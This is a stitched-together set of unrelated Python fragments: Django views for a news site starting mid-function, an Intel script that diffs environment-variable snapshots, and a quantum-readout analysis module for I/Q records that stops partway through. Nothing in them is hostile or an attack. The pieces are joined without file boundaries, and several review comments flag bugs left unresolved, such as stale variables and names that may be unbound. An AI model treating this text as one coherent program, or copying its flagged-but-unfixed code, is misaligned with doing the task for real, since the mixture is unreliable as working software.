        # fix: this line was corrupted (`<PASSWORD>.POST.<PASSWORD>('password')`);
        # restore the symmetric lookup of the password field.
        password = request.POST.get('password')
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            return redirect('home')
        messages.info(request, "Username or Password is incorrect!!!, kindly check your details")

    context = {}
    return render(request, 'accounts/login.html', context)
def logoutUser(request):
    """Log out the current user and redirect to the login page."""
    logout(request)
    return redirect('login')
# home page: requires an authenticated user, otherwise redirects to 'login'
@login_required(login_url='login')
def home(request):
    """Render the home page (no extra context)."""
    content = {}
    return render(request, 'home.html', content)
def newshome(request):
    """List news items, with optional search and category filters from the query string."""
    # fix: the query key was misspelled 'seacrh', so the search branch never ran
    # (and would have raised KeyError on request.GET['search'] if it had).
    if 'search' in request.GET:
        search = request.GET['search']
        # NOTE(review): Category appears to use a `name` field (see the
        # `category__name` filter below and addnews' get_or_create(name=...));
        # the original filtered on `category__icontains` — confirm the field name.
        categories = Category.objects.filter(name__icontains=search)
    else:
        categories = Category.objects.all()

    # filter news by the selected category, if any
    category = request.GET.get('category')
    if category is None:
        newsContents = NewsDetail.objects.all()
    else:
        newsContents = NewsDetail.objects.filter(category__name=category)

    # fix: the original unconditionally reset `categories` to all objects here,
    # discarding the search filter computed above.
    content = {'categories': categories, 'newsContents': newsContents}
    return render(request, 'newshome.html', content)
# the newsdetails template
def newsdetails(request, pk):
    """Render the detail page for a single NewsDetail item identified by `pk`."""
    article = NewsDetail.objects.get(id=pk)
    return render(request, 'newsdetails.html', {'content': article})
# the addnews temmplate
def addnews(request):
    """Display the add-news form and create a NewsDetail entry on POST."""
    categories = Category.objects.all()

    if request.method == "POST":
        posted = request.POST
        uploaded_image = request.FILES.get('image')

        # resolve the category: existing selection, new name, or none at all
        if posted['category'] != 'none':
            category = Category.objects.get(id=posted['category'])
        elif posted['newcategory'] != '':
            category, _created = Category.objects.get_or_create(name=posted['newcategory'])
        else:
            category = None

        NewsDetail.objects.create(
            category=category,
            description=posted['description'],
            date_posted=posted['posted'],
            postedby=posted['source'],
            image=uploaded_image,
        )
        return redirect('newshome')

    return render(request, 'addnews.html', {'categories': categories})
#search news by category
def search_results(request):
    """Search news by the category name passed via the `category` query parameter."""
    term = request.GET.get("category")
    if term:
        articles = NewsDetail.search_category(term)
        return render(request, 'search.html', {"message": f"{term}", "categories": articles})
    return render(request, 'search.html', {"message": "You haven't searched for any term"})
# profile details
def userPage(request):
    """Render the user page (no extra context)."""
    context = {}
    return render(request, 'user.html', context)
def profile(request):
    """Display and update the logged-in user's profile (user + profile forms)."""
    user = request.user
    # fix: get_or_create returns an (object, created) tuple; the original rebound
    # `user` to that tuple and passed it to the template. Ensure the Profile row
    # exists, but keep `user` as the authenticated user.
    Profile.objects.get_or_create(user=request.user)

    if request.method == 'POST':
        u_form = UserUpdateForm(request.POST, instance=request.user)
        p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)
        if u_form.is_valid() and p_form.is_valid():
            u_form.save()
            p_form.save()
            messages.success(request, 'Your account has been updated successfully!')
            return redirect('home')
    else:
        u_form = UserUpdateForm(instance=request.user)
        p_form = ProfileUpdateForm(instance=request.user.profile)

    context = {
        'u_form': u_form,
        'p_form': p_form,
        'user': user,
    }
    return render(request, 'profile.html', context)
# -*- coding: utf-8 -*-
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""Compare environment variables snapshot with expected and detect changes
"""
import argparse
import difflib
import logging
import pathlib
import re
import os
import sys
import typing
import uuid
def normalize_env_variables(variables: typing.Dict[str, str]) -> typing.Dict[str, str]:
    """Return a copy of *variables* with PATH-like values deduplicated and sorted."""
    # ':'-separated list variables that may accumulate duplicate entries
    path_like = ('PATH', 'PYTHONPATH', 'PKG_CONFIG_PATH', 'LD_LIBRARY_PATH', 'LIBRARY_PATH', 'OV_FRONTEND_PATH')
    normalized = {}
    for name, value in variables.items():
        if name not in path_like:
            normalized[name] = value
            continue
        entries = {entry.strip() for entry in value.split(':') if entry.strip()}
        normalized[name] = ':'.join(sorted(entries))
    return normalized
def extract_changed_environment_variables(vars_before: typing.Dict[str, str],
                                          vars_after: typing.Dict[str, str]) -> typing.Dict[str, str]:
    """Return normalized (name, value) pairs present in *vars_after* but not in *vars_before*."""
    changed = set(vars_after.items()) - set(vars_before.items())
    return normalize_env_variables(dict(changed))
def load_variables(path: str, env_prefix: bool = False) -> typing.Dict[str, str]:
    """Load environment variables from an `env` dump or a dockerfile-like file.

    :param path: file to parse
    :param env_prefix: when True, expect dockerfile-style `ENV NAME=value` records
    :return: normalized name->value dict; empty dict if any non-blank line does not match
    """
    # fix: allow digits in variable names (e.g. `VAR_2`); the original pattern
    # `[A-Za-z_]+` made the whole file parse fail (return {}) on such names.
    name_re = r'[A-Za-z_][A-Za-z0-9_]*'
    pattern = re.compile(rf'^ENV\s+({name_re})=(.*)$' if env_prefix else rf'^({name_re})=(.*)$')
    variables = {}
    with open(path) as file:
        for record in filter(None, map(str.strip, file.readlines())):
            match = pattern.match(record)
            if not match:
                # any unexpected line invalidates the whole snapshot (behavior kept from original)
                return {}
            name = match.group(1)
            value = match.group(2)
            variables[name] = value
    return normalize_env_variables(variables)
def save_env_template(path: pathlib.Path, variables: typing.Dict[str, str]):
    """Write *variables* to *path* as dockerfile-style `ENV NAME=value` lines."""
    lines = [f'ENV {name}={value}\n' for name, value in variables.items()]
    with open(path, mode='w') as template:
        template.writelines(lines)
def compare_templates(expected_path: pathlib.Path, actual_path: pathlib.Path, image: str, log: str):
    """Compare two template files and write an HTML diff into the *log* directory."""
    # unique report name so repeated runs don't overwrite each other
    report_path = pathlib.Path(log) / f'env_{uuid.uuid4()}.html'
    with open(expected_path, mode='r') as expected, \
            open(actual_path, mode='r') as actual, \
            open(report_path, mode='w') as html_log:
        diff = difflib.HtmlDiff(wrapcolumn=100)
        html_log.write(diff.make_file(expected.readlines(), actual.readlines(),
                                      'origin', image, context=True))
def main() -> int:
    """Compare environment variables snapshot with expected and create HTML report if different"""
    parser = argparse.ArgumentParser(prog=os.path.basename(__file__),
                                     description='This is script to extract environment variables changes from '
                                                 'snapshots, compare with expected and create HTML diff report '
                                                 'if different',
                                     add_help=True)
    parser.add_argument(
        '-i',
        '--image',
        metavar='NAME',
        required=True,
        help='Image name',
    )
    parser.add_argument(
        '-e',
        '--expected',
        metavar='PATH',
        required=True,
        help='Path to file with expected environment variable changes from the script',
    )
    parser.add_argument(
        '-b',
        '--before',
        metavar='PATH',
        required=True,
        help='Path to file with environment variables snapshot before script launch',
    )
    parser.add_argument(
        '-a',
        '--after',
        metavar='PATH',
        required=True,
        help='Path to file with environment variables snapshot after script launch',
    )
    parser.add_argument(
        '-l',
        '--logs',
        metavar='PATH',
        default=str(pathlib.Path(os.path.realpath(__file__)).parent),
        help='Log path folder to store logs',
    )
    args = parser.parse_args()
    logging.basicConfig(level='INFO')
    log = logging.getLogger(__name__)
    log.info(f'Parsing inputs...')
    vars_before = load_variables(args.before)
    vars_after = load_variables(args.after)
    # variables that exist only after the script ran
    vars_created = {name: vars_after[name] for name in set(vars_after.keys()) - set(vars_before.keys())}
    vars_expected = load_variables(args.expected, True)
    # current values of the variables we expected to change
    vars_expected_updated = {name: vars_after[name] for name in vars_after if name in vars_expected}
    vars_current = {**vars_expected, **vars_created, **vars_expected_updated}
    log.info('Generate updated environment variables template and search for changes:')
    output_path = pathlib.Path(args.logs) / os.path.basename(args.expected)
    save_env_template(output_path, vars_current)
    if vars_expected != vars_current:
        exit_code = 1
        vars_changed_script = extract_changed_environment_variables(vars_before, vars_after)
        vars_changed = extract_changed_environment_variables(vars_expected, vars_current)
        log.error('FAILED: changes detected')
        log.error(f' after script launch {vars_changed_script}')
        log.error(f' with expected {vars_changed}')
        compare_templates(args.expected, output_path, args.image, args.logs)
    else:
        exit_code = 0
        log.info('PASSED')
    # newly created variables fail the check even when all other values matched
    if vars_created:
        exit_code = 1
        log.error(f'FAILED: new variables are created - {vars_created}')
    if exit_code:
        log.info(f'See logs in {args.logs}')
    return exit_code
# script entry point: exit status propagates the comparison result
if __name__ == '__main__':
    sys.exit(main())
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 29 09:40:12 2021
@author: <NAME>
Set up function module that can assist in loading pulse sequences into AWG
and functionalizing Alazar acquiring
"""
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.patches import Ellipse
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
from matplotlib.colors import Normalize as Norm
from plottr.data.datadict_storage import all_datadicts_from_hdf5
from scipy.signal import butter, lfilter, sosfilt
from scipy.stats import tstd
from scipy.special import gamma
#plotting variance in the data wrt time
from plottr.data.datadict_storage import all_datadicts_from_hdf5
# Gaussian profile used for histogram fits: A * exp(-(x - m)^2 / (2 s^2))
gfit = lambda x, s, m, A: A*np.exp(-0.5*((x-m)/s)**2)


def pfit(x, m, A, scale):
    """Poisson-like profile (made continuous via the gamma function) for histogram fits.

    NOTE(review): a true Poisson pmf would use gamma(x*scale + 1) in the
    denominator; confirm the intended normalization.
    """
    scaled_x = x * scale
    return A * np.power(m, scaled_x) * np.exp(-m) / gamma(scaled_x)
def custom_var(data_slice, debug = False, timestamp = 2000, trace = 0, method = 'gauss', title = '', fit = 0):
    '''
    we don't trust the numpy var, because by eye it doesn't look like it's changing that much
    so this fuction will take in an array that is [nrecords x 1], create a histogram and fit
    that histogram to a gaussian or poisson distribution to extract variance, which is what our eyes are doing

    :param method: 'gauss' or 'poisson', selects the fit profile
    :param fit: when falsy, only the histogram is plotted and NaN is returned
    :return: |fitted width parameter|, or NaN when no fit was requested
    '''
    plt.figure()
    plt.title(f"trace {trace} time {timestamp}ns {title} distribution over records")
    h1, bins = np.histogram(data_slice, bins = 100, density = True)
    plt.plot(bins[:-1], h1, '.', label = 'data')
    if not fit:
        # fix: the original fell through to `return np.abs(popt[0])` with `popt`
        # unbound whenever `fit` was falsy, raising NameError; return NaN instead.
        plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),
                   fancybox=True, shadow=True, ncol=5)
        return np.nan
    if method == 'gauss':
        popt, pcov = curve_fit(gfit, bins[:-1], h1, maxfev = 10000, p0 = [np.max(np.abs(bins))/10, bins[50], 150])
    elif method == 'poisson':
        popt, pcov = curve_fit(pfit, bins[:-1], h1)
    if debug:
        if method == 'gauss':
            plt.plot(bins[:-1], gfit(bins[:-1], *popt), label = f'{method} fit')
        elif method == 'poisson':
            plt.plot(bins[:-1], pfit(bins[:-1], *popt), label = f'{method} fit')
        # have to be careful here, because this fit is to a scalable x-axis
        # so in terms of the real voltage, the mean is actually popt[0]/popt[-1]
        # the second parameter A should be irrelevant
        # NOTE(review): this rescale only runs in debug mode, and for 'gauss' it
        # divides sigma by the amplitude — confirm it is meant for 'poisson' only.
        popt[0] = popt[0]/popt[-1]
        plt.title(f"trace {trace} time {timestamp}ns {title} distribution over records")
    plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),
               fancybox=True, shadow=True, ncol=5)
    return np.abs(popt[0])
def plot_custom_stats_from_filepath(filepath, timeslice = 100, trace = 0, debug = 0, fit = 0):
    """Load an hdf5 datadict file and compute power/I/Q spread statistics for one trace.

    :param filepath: hdf5 file readable by all_datadicts_from_hdf5
    :param timeslice: time-sample index at which the record statistics are taken
    :param trace: index of the (I, Q) trace pair to analyze
    :return: (Pvar array, fitted Pvar array, Pavg array, I fit width, Q fit width)

    NOTE(review): if `trace` matches no index, Ivar_fit/Qvar_fit are never bound
    and the return statement raises NameError — confirm `trace` is always valid.
    """
    dicts = all_datadicts_from_hdf5(filepath)['data']
    # print(dicts)
    # keep only the I*/Q* data channels
    data_name_list = [x for x in dicts.keys() if x[0] == 'I' or x[0] == 'Q']
    time = np.unique(dicts['time']['values'])
    time_num = np.size(time)
    # number of records = total samples / samples per record
    rec_num = np.size(dicts['time']['values'])//time_num
    I_list = [name for name in data_name_list if name[0]=='I']
    Q_list = [name for name in data_name_list if name[0]=='Q']
    print(I_list)
    Pvar_arr = []
    Pvar_fit_arr = []
    Pavg_arr = []
    for i, (I_name, Q_name) in enumerate(zip(I_list, Q_list)):
        if i == trace:
            print(f"Looking at the {i, I_name, Q_name} trace")
            # reshape flat sample streams into [records x time]
            Idata = dicts[I_name]['values'].reshape(rec_num, time_num)
            Qdata = dicts[Q_name]['values'].reshape(rec_num, time_num)
            # power statistics across records at each time sample
            Pavg = np.average(np.sqrt(Idata**2+Qdata**2), axis = 0)
            Pvar = tstd(np.sqrt(Idata**2+Qdata**2), axis = 0)**2
            Pvar_arr.append(Pvar[timeslice])
            Pavg_arr.append(Pavg[timeslice])
            # histogram-fit based spread estimates at the chosen time slice
            Pvar_fit = custom_var(np.sqrt(Idata**2+Qdata**2)[:, timeslice], debug = debug, timestamp = timeslice*20, trace = I_name[-1], method = 'poisson', title = 'Power', fit = fit)
            Pvar_fit_arr.append(Pvar_fit)
            Ivar_fit = custom_var(Idata[:, timeslice], debug = debug, timestamp = timeslice*20, trace = I_name[-1], method = 'gauss', title = "I", fit = fit)
            Qvar_fit = custom_var(Qdata[:, timeslice], debug = debug, timestamp = timeslice*20, trace = I_name[-1], method = 'gauss', title = 'Q', fit = fit)
    # if debug:
    #     plt.figure()
    #     plt.plot(Pavg)
    #     plt.title("DEBUG: Average vs. sample_num")
    return np.array(Pvar_arr), np.array(Pvar_fit_arr), np.array(Pavg_arr), Ivar_fit, Qvar_fit
def plot_stats_from_filepath(filepath, plt_avg = 0, plt_var = 1, vscale = 100, plot = 0):
    """Load an hdf5 datadict file and plot average/variance statistics for all I/Q traces.

    :param vscale: scale factor applied to the variance envelopes in the average plots
    :param plot: when truthy, generate matplotlib figures; otherwise compute only
    :return: zip of (per-trace power-variance arrays, per-trace power-average arrays)

    NOTE(review): `plt_avg` and `plt_var` are accepted but never used — confirm intent.
    """
    dicts = all_datadicts_from_hdf5(filepath)['data']
    data_name_list = [x for x in dicts.keys() if x[0] == 'I' or x[0] == 'Q']
    time = np.unique(dicts['time']['values'])
    time_num = np.size(time)
    # number of records = total samples / samples per record
    rec_num = np.size(dicts['time']['values'])//time_num
    variance_dict = {}
    if plot:
        fig, axs = plt.subplots(3,2, figsize = (16,12))
        fig.suptitle(filepath.split('\\')[-1])
    I_list = [name for name in data_name_list if name[0]=='I']
    Q_list = [name for name in data_name_list if name[0]=='Q']
    titles = ["G", "E", "F"]
    Pvar_arr = []
    Pavg_arr = []
    for i, (I_name, Q_name) in enumerate(zip(I_list, Q_list)):
        # reshape flat sample streams into [records x time]
        Idata = dicts[I_name]['values'].reshape(rec_num, time_num)
        Qdata = dicts[Q_name]['values'].reshape(rec_num, time_num)
        # record-wise I values at two fixed time samples, for spread inspection
        I_at_rec0 = Idata[:, 30]
        I_at_rec1 = Idata[:, 100]
        if plot:
            plt.figure()
            print("first val: ", I_at_rec0[0])
            print("max val: ", np.max(I_at_rec0))
            plt.plot(I_at_rec0-np.average(I_at_rec0), '.', label = 'time 30*20ns')
            plt.plot(I_at_rec1-np.average(I_at_rec1), '.', label = 'time 90*20ns')
            plt.title(titles[i])
            plt.legend()
            print("variance at first value: ", np.var(I_at_rec0-np.average(I_at_rec0)))
            print("variance at second value: ", np.var(I_at_rec1-np.average(I_at_rec1)))
            plt.figure()
            h1 = np.histogram(I_at_rec1-np.average(I_at_rec0), bins = 50, density = True)
            h2 = np.histogram(I_at_rec1-np.average(I_at_rec1), bins = 50, density = True)
            plt.plot(h1[1][:-1], h1[0])
            plt.plot(h2[1][:-1], h2[0])
        # power statistics across records at each time sample
        Pavg = np.average(np.sqrt(Idata**2+Qdata**2), axis = 0)
        Pvar = tstd(np.sqrt(Idata**2+Qdata**2), axis = 0)**2
        Pvar_arr.append(Pvar)
        Pavg_arr.append(Pavg)
    for name in I_list:
        data = dicts[name]['values'].reshape(rec_num, time_num)
        avg = np.average(data, axis = 0)
        var = np.var(data-np.average(data, axis = 0), axis = 0)
        # NOTE(review): var_coherent is computed but never used
        var_coherent = var/np.sqrt(np.abs(avg))
        variance_dict[name] = var
        if plot:
            # shade +/- vscale*variance around the record-averaged trace
            axs[0, 0].fill_between(time, np.average(data, axis = 0)-vscale*var, np.average(data, axis = 0)+vscale*var, label = name)
            axs[0,0].plot(time, np.average(data, axis = 0))
            axs[1, 0].plot(time, var, label = name)
    if plot:
        axs[0,0].set_title("Averages")
        axs[1,0].set_title("Variances")
        axs[0,0].grid()
        axs[1,0].grid()
        axs[0,0].legend()
        axs[1,0].legend()
    for name in Q_list:
        data = dicts[name]['values'].reshape(rec_num, time_num)
        var = np.var(data, axis = 0)
        variance_dict[name] = var
        # NOTE(review): `avg` here is stale — left over from the last I-channel
        # iteration above, not recomputed for this Q channel; confirm intent.
        var_coherent = var/np.sqrt(np.abs(avg))
        if plot:
            axs[0, 1].fill_between(time, np.average(data, axis = 0)-vscale*var, np.average(data, axis = 0)+vscale*var, label = name)
            axs[0,1].plot(time, np.average(data, axis = 0))
            axs[1, 1].plot(time, var, label = name)
    if plot:
        # NOTE(review): Pavg/Pvar here hold only the LAST trace's values from the
        # first loop, not all traces — confirm this is the intended plot.
        axs[2,0].plot(time, Pavg)
        axs[2,1].plot(time, Pvar)
        axs[0,1].set_title("Averages")
        axs[1,1].set_title("Variances")
        axs[0,1].grid()
        axs[1,1].grid()
        axs[0,1].legend()
        axs[1,1].legend()
        fig.tight_layout()
    return zip(np.array(Pvar_arr), np.array(Pavg_arr))
def Process_One_Acquisition_3_state(name, time_vals, sI_c1, sI_c2, sI_c3, sQ_c1 ,sQ_c2, sQ_c3, figscale = 1, hist_scale = 200, odd_only = False, even_only = False, plot = False, lpf = True, lpf_wc = 1e6, fit = False, hist_y_scale = 10, boxcar = False, bc_window = [50, 150], record_track = False, rec_start = 0, rec_stop = 7860, debug = False, tstart_index = 0, tstop_index = -1, guess = 0, rec_skip = 5):
    '''
    Process one three-state (G/E/F) readout acquisition and estimate classification fidelities.

    Pipeline (as implemented below):
      1. Subsample the records with ``[rec_start:rec_stop:rec_skip]``.
      2. Optionally low-pass filter every record (10th-order Butterworth via
         scipy ``butter``/``lfilter``) before classification.
      3. Build demodulation weight functions Sij (for distinguishing trace i
         from trace j) either as a boxcar window or as the difference of the
         class-averaged I/Q traces, time-gated by [tstart_index, tstop_index].
      4. Project every record onto each weight pair and histogram the results
         (``weighted_histogram``, a project helper).
      5. If ``fit``: fit 2D Gaussians to each histogram, build per-pixel
         discriminants, classify every record, and compute fidelities.

    Parameters
    ----------
    name : str            -- title used on the figures.
    time_vals : 1D array  -- sample times for one record; sampling rate is
                             derived from its first difference.
    sI_c1..sQ_c3 : 2D arrays (records x time) -- I and Q records for the
                             three prepared states (c1=G, c2=E, c3=F).
    figscale, hist_scale, hist_y_scale -- plotting/histogram scale knobs.
    odd_only, even_only   -- accepted but unused in this body.
    lpf, lpf_wc           -- enable low-pass filtering and its cutoff.
                             NOTE(review): the cutoff passed to butter is
                             lpf_wc/1e9 with fs from time_vals -- presumably a
                             Hz-to-(1/ns) unit conversion; confirm units.
    boxcar, bc_window     -- use a flat window [start, stop] as the weight
                             function instead of averaged-trace differences.
                             NOTE(review): mutable default argument
                             bc_window=[50, 150] is shared across calls.
    record_track, debug, plot, fit, guess -- feature switches.
    rec_start, rec_stop, rec_skip -- record subsampling.
    tstart_index, tstop_index     -- time gate applied to the weights.

    Returns
    -------
    (G_fidelity, E_fidelity, F_fidelity, fidelity, numberNull) when
    ``fit`` is truthy; implicitly None otherwise.
    '''
    # Sampling rate from the time axis spacing.
    fs = 1/np.diff(time_vals)[0]
    print('\n\n\nsampling rate: ', fs)
    # Subsample the records; .copy() decouples from the caller's arrays.
    sI_c1 = sI_c1[rec_start:rec_stop:rec_skip].copy()
    sI_c2 = sI_c2[rec_start:rec_stop:rec_skip].copy()
    sI_c3 = sI_c3[rec_start:rec_stop:rec_skip].copy()
    sQ_c1 = sQ_c1[rec_start:rec_stop:rec_skip].copy()
    sQ_c2 = sQ_c2[rec_start:rec_stop:rec_skip].copy()
    sQ_c3 = sQ_c3[rec_start:rec_stop:rec_skip].copy()
    if lpf:
        # Low-pass filter each record individually before classification.
        # NOTE(review): the Butterworth design is recomputed for every record
        # of every channel even though it is loop-invariant.
        sI_c1_classify = np.empty(np.shape(sI_c1))
        sI_c2_classify = np.empty(np.shape(sI_c1))
        sI_c3_classify = np.empty(np.shape(sI_c1))
        sQ_c1_classify = np.empty(np.shape(sI_c1))
        sQ_c2_classify = np.empty(np.shape(sI_c1))
        sQ_c3_classify = np.empty(np.shape(sI_c1))
        for i, (rec1, rec2, rec3, rec4, rec5, rec6) in enumerate(zip(sI_c1, sI_c2, sI_c3, sQ_c1, sQ_c2, sQ_c3)):
            sI_c1_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec1)
            sI_c2_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec2)
            sI_c3_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec3)
            sQ_c1_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec4)
            sQ_c2_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec5)
            sQ_c3_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec6)
    else:
        # No filtering: classify on the raw (subsampled) records.
        sI_c1_classify = sI_c1
        sI_c2_classify = sI_c2
        sI_c3_classify = sI_c3
        sQ_c1_classify = sQ_c1
        sQ_c2_classify = sQ_c2
        sQ_c3_classify = sQ_c3
    # From here on the working arrays are the (possibly filtered) records.
    sI_c1 = sI_c1_classify.copy()
    sI_c2 = sI_c2_classify.copy()
    sI_c3 = sI_c3_classify.copy()
    sQ_c1 = sQ_c1_classify.copy()
    sQ_c2 = sQ_c2_classify.copy()
    sQ_c3 = sQ_c3_classify.copy()
    if boxcar:
        # Flat (boxcar) weight function: 1 inside bc_window, 0 elsewhere,
        # shared by all six weight components.
        WF = np.zeros(np.size(time_vals))
        WF[bc_window[0]:bc_window[1]] = 1
        Sge_I = Sge_Q = Sgf_I = Sgf_Q = Sef_I = Sef_Q = WF#/(bc_window[1]-bc_window[0])
    else:
        # Time gate applied to the matched-filter weights.
        # NOTE(review): with the default tstop_index = -1 the slice
        # tfilt[tstop_index:-1] is empty, so no tail is zeroed; for other
        # values the slice stops one sample short of the end -- confirm
        # whether tfilt[tstop_index:] was intended.
        tfilt = np.ones(np.size(np.unique(time_vals)))
        tfilt[0:tstart_index] = 0
        tfilt[tstop_index:-1] = 0
        # Weight functions denoted by Sij for telling trace i from trace j:
        # difference of the class-averaged traces, gated by tfilt.
        Sge_I, Sge_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c2, axis = 0))*tfilt, (np.average(sQ_c1, axis = 0)-np.average(sQ_c2, axis = 0))*tfilt]
        Sgf_I, Sgf_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c3, axis = 0))*tfilt, (np.average(sQ_c1, axis = 0)-np.average(sQ_c3, axis = 0))*tfilt]
        Sef_I, Sef_Q = [(np.average(sI_c2, axis = 0)-np.average(sI_c3, axis = 0))*tfilt, (np.average(sQ_c2, axis = 0)-np.average(sQ_c3, axis = 0))*tfilt]
    # if lpf:
    #     Sge = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sge)
    #     Sgf = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sgf)
    #     Sef = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sef)
    # Normalizing weight functions (currently disabled):
    # Sge_I /= np.sum(np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)]))
    # Sge_Q /= np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)])
    # Sef_I /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
    # Sef_Q /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
    # Sgf_I /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
    # Sgf_Q /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
    # Class-averaged traces (used for plotting and histogram auto-scaling).
    sI_c1_avg = np.average(sI_c1, axis = 0)
    sI_c2_avg = np.average(sI_c2, axis = 0)
    sI_c3_avg = np.average(sI_c3, axis = 0)
    sQ_c1_avg = np.average(sQ_c1, axis = 0)
    sQ_c2_avg = np.average(sQ_c2, axis = 0)
    sQ_c3_avg = np.average(sQ_c3, axis = 0)
    if plot:
        # Figure 1: averaged I/Q traces, IQ-plane trajectories, and the
        # weight functions.
        fig = plt.figure(1, figsize = tuple(np.array([12,8])*figscale))
        fig.suptitle(name, fontsize = 20)
        ax1 = fig.add_subplot(221)
        ax1.set_title("I average")
        ax1.set_ylabel("Voltage (mV)")
        ax1.set_xlabel("Time (ns)")
        ax1.plot(time_vals, np.average(sI_c1, axis = 0)*1000, label = 'G_records')
        ax1.plot(time_vals,np.average(sI_c2, axis = 0)*1000, label = 'E_records')
        ax1.plot(time_vals,np.average(sI_c3, axis = 0)*1000, label = 'F_records')
        ax1.grid()
        # ax1.set_aspect(1)
        ax2 = fig.add_subplot(222)
        ax2.set_title("Q average")
        # NOTE(review): these two calls label ax1, not ax2 -- probably a
        # copy/paste slip; confirm before changing.
        ax1.set_ylabel("Voltage (mV)")
        ax1.set_xlabel("Time (ns)")
        ax2.plot(time_vals,np.average(sQ_c1, axis = 0)*1000, label = 'G records')
        ax2.plot(time_vals,np.average(sQ_c2, axis = 0)*1000, label = 'E records')
        ax2.plot(time_vals,np.average(sQ_c3, axis = 0)*1000, label = 'F records')
        ax2.grid()
        # ax2.set_aspect(1)
        ax2.legend(bbox_to_anchor=(1.05, 1.0),
                   loc='upper left')
        ax3 = fig.add_subplot(223)
        ax3.set_title("Trajectories")
        ax3.set_ylabel("I Voltage (mV)")
        ax3.set_xlabel("Q Voltage (mV)")
        ax3.set_aspect(1)
        ax3.plot(np.average(sI_c1, axis = 0)*1000, np.average(sQ_c1, axis = 0)*1000)
        ax3.plot(np.average(sI_c2, axis = 0)*1000,np.average(sQ_c2, axis = 0)*1000)
        ax3.plot(np.average(sI_c3, axis = 0)*1000,np.average(sQ_c3, axis = 0)*1000)
        ax3.grid()
        ax4 = fig.add_subplot(224)
        ax4.set_title("Weight Functions")
        ax4.plot(Sge_I, label = 'Wge_I')
        ax4.plot(Sge_Q, label = 'Wge_Q')
        ax4.plot(Sgf_I, label = 'Wgf_I')
        ax4.plot(Sgf_Q, label = 'Wgf_Q')
        ax4.plot(Sef_I, label = 'Wef_I')
        ax4.plot(Sef_Q, label = 'Wef_Q')
        ax4.legend(bbox_to_anchor=(1.05, 1.0),
                   loc='upper left')
        ax4.grid()
        fig.tight_layout(h_pad = 1, w_pad = 1.5)
        # Figure 2: 3x3 grid of weighted histograms -- rows are the weight
        # pair (GE/GF/EF), columns are the prepared state (G/E/F).
        fig2 = plt.figure(2, figsize = (12,8))
        ax11 = fig2.add_subplot(331)
        ax11.set_title("GE - G")
        ax12 = fig2.add_subplot(332)
        ax12.set_title("GE - E")
        ax13 = fig2.add_subplot(333)
        ax13.set_title("GE - F")
        ax21 = fig2.add_subplot(334)
        ax21.set_title("GF - G")
        ax22 = fig2.add_subplot(335)
        ax22.set_title("GF - E")
        ax23 = fig2.add_subplot(336)
        ax23.set_title("GF - F")
        ax31 = fig2.add_subplot(337)
        ax31.set_title("EF - G")
        ax32 = fig2.add_subplot(338)
        ax32.set_title("EF - E")
        ax33 = fig2.add_subplot(339)
        ax33.set_title("EF - F")
        ax11.grid()
        ax12.grid()
        ax13.grid()
        ax21.grid()
        ax22.grid()
        ax23.grid()
        ax31.grid()
        ax32.grid()
        ax33.grid()
        fig2.tight_layout(h_pad = 1, w_pad = 1)
    else:
        # No plotting: weighted_histogram still receives fig/ax arguments,
        # so pass None placeholders.
        fig2 = None
        ax11 = ax12 = ax13 = ax21 = ax22 = ax23 = ax31 = ax32 = ax33 = None
    # Using GE weights: choose the histogram extents.
    # NOTE(review): PEP 8 prefers `hist_scale is None` over `== None`.
    if hist_scale == None:
        # Auto-scale from the G-state averaged trace amplitude.
        hist_scale = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
        hist_scale1 = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
        hist_scale2 = hist_scale1
        hist_scale3 = hist_scale1
    else:
        hist_scale1 = hist_scale
        hist_scale2 = hist_scale
        hist_scale3 = hist_scale
    # hist_scale2 = np.max(np.abs([sI_c2_avg, sQ_c2_avg]))*1.2
    # hist_scale3 = np.max(np.abs([sI_c3_avg, sQ_c3_avg]))*1.2
    # GE weights: project each prepared state's records onto (Sge_I, Sge_Q).
    bins_GE_G, h_GE_G, I_GE_G_pts, Q_GE_G_pts = weighted_histogram(Sge_I, Sge_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax11, scale = hist_scale1, record_track = record_track)
    bins_GE_E, h_GE_E, I_GE_E_pts, Q_GE_E_pts = weighted_histogram(Sge_I, Sge_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax12, scale = hist_scale2, record_track = record_track)
    bins_GE_F, h_GE_F, I_GE_F_pts, Q_GE_F_pts = weighted_histogram(Sge_I, Sge_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax13, scale = hist_scale3, record_track = record_track)
    #
    # GF weights:
